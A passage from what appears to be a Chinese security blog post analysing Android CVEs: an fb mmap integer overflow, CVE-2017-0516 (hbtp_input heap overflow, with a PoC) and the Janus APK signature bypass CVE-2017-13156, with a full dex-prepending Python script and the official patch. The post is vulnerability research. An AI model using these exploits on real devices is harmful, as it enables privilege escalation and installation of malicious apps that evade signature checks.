class="keyword">if</span> ((vma-&gt;vm_end - vma-&gt;vm_start + off) &gt; len)</span><br><span class="line">        <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    off += start;</span><br><span class="line">    vma-&gt;vm_pgoff = off &gt;&gt; PAGE_SHIFT;</span><br><span class="line">    <span class="comment">/* VM_IO | VM_DONTEXPAND | VM_DONTDUMP are set by io_remap_pfn_range()*/</span></span><br><span class="line">    vma-&gt;vm_page_prot = vm_get_page_prot(vma-&gt;vm_flags);</span><br><span class="line">    fb_pgprotect(file, vma, off);</span><br><span class="line">    <span class="keyword">if</span> (io_remap_pfn_range(vma, vma-&gt;vm_start, off &gt;&gt; PAGE_SHIFT,</span><br><span class="line">        vma-&gt;vm_end - vma-&gt;vm_start, vma-&gt;vm_page_prot))</span><br><span class="line">        <span class="keyword">return</span> -EAGAIN;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="分析利用"><a href="#分析利用" class="headerlink" title="分析利用"></a>分析利用</h2><p>vma-&gt;vm_end 和 vma-&gt;vm_start 是 mmap 的前两个参数，描述了要映射到的地址范围，vm_end - vm_start 得到的是要映射的 size，代码中用 size + off 判断要映射的大小是否在 len 之内。这三个值都是可以控制的，通过控制这三个值产生整数溢出，绕过判断。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mapped_address = mmap((<span class="keyword">void</span> *)MAPPED_BASE, (<span class="number">0x100000000</span> - kernel_phys_address),</span><br><span class="line">                        PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED,</span><br><span class="line">                        *fd, kernel_phys_address + info.smem_len);</span><br></pre></td></tr></table></figure>
<p>MAPPED_BASE 是固定的值，为 0x20000000，即要映射的地址。size 上用一个大于 32 位的数减去了内核基地址。<br>off 是用内核地址加上了 smem_len。</p>
<h2 id="CVE-2017-0516"><a href="#CVE-2017-0516" class="headerlink" title="CVE-2017-0516"></a>CVE-2017-0516</h2><h3 id="描述-2"><a href="#描述-2" class="headerlink" title="描述"></a>描述</h3><blockquote>
<p>hbtp_input 的驱动在处理 HBTP_SET_ABSPARAM 时没有对下标进行有效的范围判断，导致下标溢出，进而导致堆溢出，此时用户态程序获得堆数据写入的机会。</p>
</blockquote>
<h3 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ABS_MAX                 0x3f</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ABS_CNT                 (ABS_MAX+1)</span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">input_set_abs_params</span><span class="params">(struct input_dev *dev, <span class="keyword">unsigned</span> <span class="keyword">int</span> axis,</span></span></span><br><span class="line"><span class="function"><span class="params">                          <span class="keyword">int</span> min, <span class="keyword">int</span> max, <span class="keyword">int</span> fuzz, <span class="keyword">int</span> flat)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">input_absinfo</span> *<span class="title">absinfo</span>;</span></span><br><span class="line"></span><br><span class="line">    input_alloc_absinfo(dev);</span><br><span class="line">    <span class="keyword">if</span> (!dev-&gt;absinfo)</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    absinfo = &amp;dev-&gt;absinfo[axis];  <span class="comment">// Notice</span></span><br><span class="line">    absinfo-&gt;minimum = min;</span><br><span class="line">    absinfo-&gt;maximum = max;</span><br><span class="line">    absinfo-&gt;fuzz = fuzz;</span><br><span class="line">    absinfo-&gt;flat = flat;</span><br><span class="line"></span><br><span class="line">    __set_bit(EV_ABS, dev-&gt;evbit);</span><br><span class="line">    __set_bit(axis, dev-&gt;absbit);</span><br><span class="line">&#125;</span><br><span class="line">EXPORT_SYMBOL(input_set_abs_params);</span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">0</span>; i &lt;= ABS_MT_LAST - ABS_MT_FIRST; i++) &#123;</span><br><span class="line">    <span class="built_in">abs</span> = absinfo + i;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">abs</span>-&gt;active)</span><br><span class="line">        input_set_abs_params(input_dev, <span class="built_in">abs</span>-&gt;code,</span><br><span class="line">                <span class="built_in">abs</span>-&gt;minimum, <span class="built_in">abs</span>-&gt;maximum, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>absinfo 为 struct hbtp_input_absinfo* 数组，每次取出一个 abs 后，调用 input_set_abs_params 给 input_dev 赋值。axis 被当作了下标来处理，axis 来自 abs-&gt;code，用户态可控。所以，用户态程序可以使之访问到其他内存，并能够通过 abs-&gt;minimum 和 abs-&gt;maximum 写入 max 和 min。</p>
<h2 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">hbtp_input_absinfo</span> <span class="title">absinfo</span>[<span class="title">ABS_MT_LAST</span> - <span class="title">ABS_MT_FIRST</span> + 1] = &#123;</span> <span class="number">0</span> &#125;;</span><br><span class="line">    <span class="keyword">int</span> fd = getfd(dev);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; ABS_MT_LAST - ABS_MT_FIRST + <span class="number">1</span>; i++) &#123;</span><br><span class="line">        absinfo[i].active = <span class="number">1</span>;</span><br><span class="line">        absinfo[i].code = <span class="number">0xFFFF</span> - i;</span><br><span class="line">        absinfo[i].minimum = <span class="number">0xAAAAAAAA</span>;</span><br><span class="line">        absinfo[i].maximum = <span class="number">0xAAAAAAAA</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(<span class="literal">true</span>) &#123;</span><br><span class="line">        ioctl(fd, HBTP_SET_ABSPARAM, absinfo);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><a href="https://github.com/ScottyBauer/Android_Kernel_CVE_POCs/blob/master/CVE-2017-0516.c">POC来自这里</a></p>
<h2 id="Janus签名漏洞-CVE-2017-13156"><a href="#Janus签名漏洞-CVE-2017-13156" class="headerlink" title="Janus签名漏洞(CVE-2017-13156)"></a>Janus签名漏洞(CVE-2017-13156)</h2><h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>Android4.4 以后引入 art虚拟机，相比只能执行 apk 的 dvm，art 既可以执行 apk，也可以执行优化后的 dex，通过魔数来区分。</p>
<p>Zip 文件的读取方式是读文件末尾定位的 central directory，然后通过里面的索引定位到各个 zip entry，每个 entry 解压之后都对应一个文件。ParseZipArchive 函数在进行以上处理时候并没有判断文件头部的魔数是否为504B0304(即Zip)。</p>
<p>因此根据以上两点，攻击者可以通过将恶意 dex 文件放到 apk 文件的头部，在系统安装 apk 文件时，系统安装器解压 zip 时并没有先判断 apk 文件的头部 magic 字段，直接默认是 apk(zip) 文件，从而直接从文件尾部进行读取解压，此时签名没有任何变化，因此可欺骗系统，进行安装。</p>
<p>在用户运行 apk 时，ART 虚拟机会去判断文件头部的 magic 字段，从而执行恶意 dex。</p>
<h3 id="利用-2"><a href="#利用-2" class="headerlink" title="利用"></a>利用</h3><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> zlib <span class="keyword">import</span> adler32</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update_checksum</span><span class="params">(data)</span>:</span></span><br><span class="line">    <span class="string">'''</span></span><br><span class="line"><span class="string">    生成sha1 hash</span></span><br><span class="line"><span class="string">    "&lt;L" 小端存储unsigned long</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    m = hashlib.sha1()</span><br><span class="line">    m.update(data[<span class="number">32</span>:])</span><br><span class="line">    data[<span class="number">12</span>:<span class="number">12</span>+<span class="number">20</span>] = m.digest()</span><br><span class="line">    v = adler32(buffer(data[<span class="number">12</span>:])) &amp; <span class="number">0xffffffff</span></span><br><span class="line">    data[<span class="number">8</span>:<span class="number">12</span>] = struct.pack(<span class="string">"&lt;L"</span>, v)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) != <span class="number">4</span>:</span><br><span class="line">        print(<span class="string">"usage: %s dex apk out_apk"</span> % __file__)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line">    _, dex, apk, out_apk = sys.argv</span><br><span class="line">    <span class="keyword">with</span> open(dex, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">        dex_data = bytearray(f.read())</span><br><span class="line">    dex_size = len(dex_data)</span><br><span class="line">    <span class="keyword">with</span> open(apk, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">        apk_data = bytearray(f.read())</span><br><span class="line">    cd_end_addr = apk_data.rfind(<span class="string">'\x50\x4b\x05\x06'</span>)</span><br><span class="line">    cd_start_addr = struct.unpack(<span class="string">"&lt;L"</span>, apk_data[cd_end_addr+<span class="number">16</span>:cd_end_addr+<span class="number">20</span>])[<span class="number">0</span>]</span><br><span class="line">    apk_data[cd_end_addr+<span class="number">16</span>:cd_end_addr+<span class="number">20</span>] = struct.pack(<span class="string">"&lt;L"</span>, cd_start_addr+dex_size)</span><br><span class="line">    pos = cd_start_addr</span><br><span class="line">    <span class="keyword">while</span> (pos &lt; cd_end_addr):</span><br><span class="line">        offset = struct.unpack(<span class="string">"&lt;L"</span>, apk_data[pos+<span class="number">42</span>:pos+<span class="number">46</span>])[<span class="number">0</span>]</span><br><span class="line">        apk_data[pos+<span class="number">42</span>:pos+<span class="number">46</span>] = struct.pack(<span class="string">"&lt;L"</span>, offset+dex_size)</span><br><span class="line">        pos = apk_data.find(<span class="string">"\x50\x4b\x01\x02"</span>, pos+<span class="number">46</span>, cd_end_addr)</span><br><span class="line">        <span class="keyword">if</span> pos == <span class="number">-1</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    out_data = dex_data + apk_data</span><br><span class="line">    out_data[<span class="number">32</span>:<span class="number">36</span>] = struct.pack(<span class="string">"&lt;L"</span>, len(out_data))</span><br><span class="line">    update_checksum(out_data)</span><br><span class="line">    <span class="keyword">with</span> open(out_apk, <span class="string">"wb"</span>) <span class="keyword">as</span> f:</span><br><span class="line">        f.write(out_data)</span><br><span class="line">    <span class="keyword">print</span> (<span class="string">'%s generated'</span> % out_apk)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<h3 id="官方修复"><a href="#官方修复" class="headerlink" title="官方修复"></a>官方修复</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/libziparchive/zip_archive.cc b/libziparchive/zip_archive.cc</span><br><span class="line">index <span class="number">78</span>de40a..d0bbd72 <span class="number">100644</span></span><br><span class="line">--- a/libziparchive/zip_archive.cc</span><br><span class="line">+++ b/libziparchive/zip_archive.cc</span><br><span class="line">@@ <span class="number">-441</span>,<span class="number">6</span> +<span class="number">441</span>,<span class="number">22</span> @@</span><br><span class="line">       <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">     &#125;</span><br><span class="line">   &#125;</span><br><span class="line">+</span><br><span class="line">+  <span class="keyword">uint32_t</span> lfh_start_bytes;</span><br><span class="line">+  <span class="comment">//读取zip头部信息</span></span><br><span class="line">+  <span class="keyword">if</span> (!archive-&gt;mapped_zip.ReadAtOffset(<span class="keyword">reinterpret_cast</span>&lt;<span class="keyword">uint8_t</span>*&gt;(&amp;lfh_start_bytes),</span><br><span class="line">+                                        <span class="keyword">sizeof</span>(<span class="keyword">uint32_t</span>), <span class="number">0</span>)) &#123;</span><br><span class="line">+    ALOGW(<span class="string">"Zip: Unable to read header for entry at offset == 0."</span>);</span><br><span class="line">+    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">+  &#125;</span><br><span class="line">+</span><br><span class="line">   <span class="comment">//增加kSignature头部验证，不同时返回-1</span></span><br><span class="line">+  <span class="keyword">if</span> (lfh_start_bytes != LocalFileHeader::kSignature) &#123;</span><br><span class="line">+    ALOGW(<span class="string">"Zip: Entry at offset zero has invalid LFH signature %"</span> PRIx32, lfh_start_bytes);</span><br><span class="line">+  <span class="meta">#<span class="meta-keyword">if</span> defined(__ANDROID__)</span></span><br><span class="line">+    android_errorWriteLog(<span class="number">0x534e4554</span>, <span class="string">"64211847"</span>);</span><br><span class="line">+  <span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">+    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">+  &#125;</span><br><span class="line">+</span><br><span class="line">   ALOGV(<span class="string">"+++ zip good scan %"</span> PRIu16 <span class="string">" entries"</span>, num_entries);</span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure>

                
<p class="pink-link-context">
    <a href="/2020/04/06/Linuxkernelpwn基础整理/" rel="next" title="Linux kernel pwn 基础整理">
    Prev: Linux kernel pwn 基础整理
  </a>
</p>



<p class="pink-link-context">
    <a href="/2020/04/01/关于Oracle的一条攻击链/" rel="next" title="关于 Oracle 的一条攻击链">
    Next: 关于 Oracle 的一条攻击链
  </a>
</p>


            </div>
			
        </div>
    </div>
</article>






</div>

        <div class="fixed-action-btn float-sitemap">
    <a class="btn-floating btn-large pink">
      <i class="fa fa-caret-square-o-up"></i>
    </a>
    <ul>
      <li><a class="btn-return-top btn-floating waves-effect pink" title="Return to top"><i class="fa fa-arrow-circle-o-up"></i></a></li>
      <li><a class="btn-floating waves-effect button-collapse pink darken-1"  data-activates="main-menu" title="Menu"><i class="fa fa-navicon"></i></a></li>
    </ul>
  </div>

    </main>
    <footer class="page-footer pink accent-1 darken-1">
    
    <div class="footer-container container">
        <div class="row">
            
            <div class="social-group col m4 s12">
                <h5 class="white-text">Social</h5>
                
                    <a class="social-link" href="https://github.com/cracke-s-j" target="_blank">
                        <i class="fa fa-2x fa-github"></i>
                    </a>
                
                

            </div>
            

            
            <div class="col m8 s12">
                <h5 class="white-text">Links</h5>
                
                    <a class="social-link" href="https://blog.dyf.ink/" target="_blank">友情链接 dyf&#39;s blog</a>
                
            </div>
            
        </div>
    </div>
    

    <div class="footer-copyright pink-link-context">
        <div class="container">
            © 2020 ssj, All rights reserved.
            <p class="right" style="margin-top: 0;">Blog powered by <a href="https://hexo.io">Hexo</a> | Theme <a href="https://github.com/raytaylorlin/hexo-theme-raytaylorism">raytaylorism</a></p>
        </div>
    </div>
</footer>


    <noscript>
    <div class="noscript">
        <p class="center-align">当前网速较慢或者你使用的浏览器不支持博客特定功能，请尝试刷新或换用Chrome、Firefox等现代浏览器</p>
    </div>
</noscript>
<div class="noscript">
    <p class="center-align">当前网速较慢或者你使用的浏览器不支持博客特定功能，请尝试刷新或换用Chrome、Firefox等现代浏览器</p>
</div>


<script src="/js/jquery.min.js"></script>
<script src="/js/materialize.min.js"></script>

<script>
    (function($) {
        $(document).ready(function() {
            // 隐藏禁用javascript（针对微信内置浏览器）的提示
            $('.noscript').hide();

            // 图片缩放效果
            var $imgs = $('img').not('.slider-image').not('.avatar-image').not('.carousel-image').not('.card-cover-image').not('.qrcode');

            // 给图片加上点击放大效果（materialbox插件）
            $imgs.addClass('materialboxed').each(function(i, el) {
                $(this).attr('data-caption', $(this).attr('alt') || ' ');
            }).materialbox();

            // 优化表格的显示
            $('table').each(function() {
                var $table = $(this);
                // 除去多行代码的情况
                if ($table.find('pre').length == 0) {
                    $table.addClass('responsive-table striped bordered');
                }
            });

            // 首页幻灯片
            $('.slider').slider({indicators: true, full_width: true, interval: 8000});

            $(".button-collapse").sideNav();
            $(".category-menu").sideNav();

            // 针对gallery post
            $('.carousel').carousel({full_width: true});
            $('.carousel-control.prev').click(function() {
                $('.carousel').carousel('prev');
            });
            $('.carousel-control.next').click(function() {
                $('.carousel').carousel('next');
            });

            // 文章目录
            $('article').not('.simple-article').find('h1').add('h2').add('h3').add('h4').add('h5').add('h6').scrollSpy();

            // 目录随屏幕滚动（防止目录过长越过footer）
            var $toc = $('.toc');
            var scrollTargetTop = 0;
            $(window).scroll(function() {
                var $activeLink = $toc.find('a.active.section');
                if ($(window).scrollTop() < 100) {
                    scrollTargetTop = 0;
                } else {
                    if ($activeLink[0]) {
                        scrollTargetTop = $activeLink.offset().top - $toc.offset().top;
                    }
                }
                $toc.css('top', '-' + scrollTargetTop + 'px');
            });

            // 修正文章目录的left-border颜色
            var color = $('.table-of-contents-text').css('color');
            $('.table-of-contents-link').css('border-left-color', color);

            // 针对移动端做的优化：FAB按钮点击一下收回
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
                $('.fixed-action-btn').addClass('click-to-toggle');
            }
            // 回到顶部
            $('.btn-return-top').click(function() {
                $('body, html').animate({
                    scrollTop: 0
                }, 500);
            });

            // 重置读书页面的Tab标签页的颜色
            $('li.tab a').hover(function() {
                $(this).toggleClass('text-lighten-4');
            });
            $('.indicator').addClass('pink lighten-2');

            
            // 添加new标签
            $('').append('<span class="new badge pink"></span>');
            

            // 搜索功能
            $('.modal-trigger').leanModal({
                // 打开搜索框时自动聚焦
                ready: function() {
                    if ($('#search').is(":visible")) {
                        $('#search-input').focus();
                    }
                }
            });
            var searchXml = "";
            if (searchXml.length == 0) {
             	searchXml = "search.xml";
            }
            var searchPath = "/" + searchXml;
            initSearch(searchPath, 'search-input', 'search-result');
        });

        // 初始化搜索与匹配函数
        var initSearch = function(path, search_id, content_id) {
            'use strict';
            $.ajax({
                url: path,
                dataType: "xml",
                success: function(xmlResponse) {
                    // get the contents from search data
                    var datas = $("entry", xmlResponse).map(function() {
                        return {
                            title: $("title", this).text(),
                            content: $("content", this).text(),
                            url: $("url", this).text()
                        };
                    }).get();
                    var $input = document.getElementById(search_id);
                    var $resultContent = document.getElementById(content_id);
                    $input.addEventListener('input', function() {
                        var str = '<ul class=\"search-result-list\">';
                        var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                        $resultContent.innerHTML = "";
                        if (this.value.trim().length <= 0) {
                            return;
                        }
                        // perform local searching
                        datas.forEach(function(data) {
                            var isMatch = true;
                            var content_index = [];
                            var data_title = data.title.trim().toLowerCase();
                            var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                            var data_url = data.url;
                            var index_title = -1;
                            var index_content = -1;
                            var first_occur = -1;
                            // only match artiles with not empty titles and contents
                            if (data_title != '' && data_content != '') {
                                keywords.forEach(function(keyword, i) {
                                    index_title = data_title.indexOf(keyword);
                                    index_content = data_content.indexOf(keyword);
                                    if (index_title < 0 && index_content < 0) {
                                        isMatch = false;
                                    } else {
                                        if (index_content < 0) {
                                            index_content = 0;
                                        }
                                        if (i == 0) {
                                            first_occur = index_content;
                                        }
                                    }
                                });
                            }
                            // show search results
                            if (isMatch) {
                                keywords.forEach(function(keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    data_title = data_title.replace(regS, "<span class=\"search-keyword pink lighten-2\">" + keyword + "</span>");
                                });

                                str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                                var content = data.content.trim().replace(/<[^>]+>/g, "");
                                if (first_occur >= 0) {
                                    // cut out 100 characters
                                    var start = first_occur - 20;
                                    var end = first_occur + 80;
                                    if (start < 0) {
                                        start = 0;
                                    }
                                    if (start == 0) {
                                        end = 100;
                                    }
                                    if (end > content.length) {
                                        end = content.length;
                                    }
                                    var match_content = content.substring(start, end);
                                    // highlight all keywords
                                    keywords.forEach(function(keyword) {
                                        var regS = new RegExp(keyword, "gi");
                                        match_content = match_content.replace(regS, "<span class=\"search-keyword pink lighten-2\">" + keyword + "</span>");
                                    });

                                    str += "<p class=\"search-result\">..." + match_content + "...</p>"
                                }
                                str += "</li>";
                            }
                        });
                        str += "</ul>";
                        $resultContent.innerHTML = str;
                    });
                }
            });
        }
    })(jQuery);
</script>


<script src="/js/prettify.js"></script>
<script type="text/javascript">
    $(document).ready(function() {
        $("pre").addClass("prettyprint");
        prettyPrint();
    });
</script>






<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]}
});
</script>
<script type="text/javascript" async
  src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML">
</script>



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"superSample":2,"width":250,"height":500,"position":"left","hOffset":0,"vOffset":-100},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
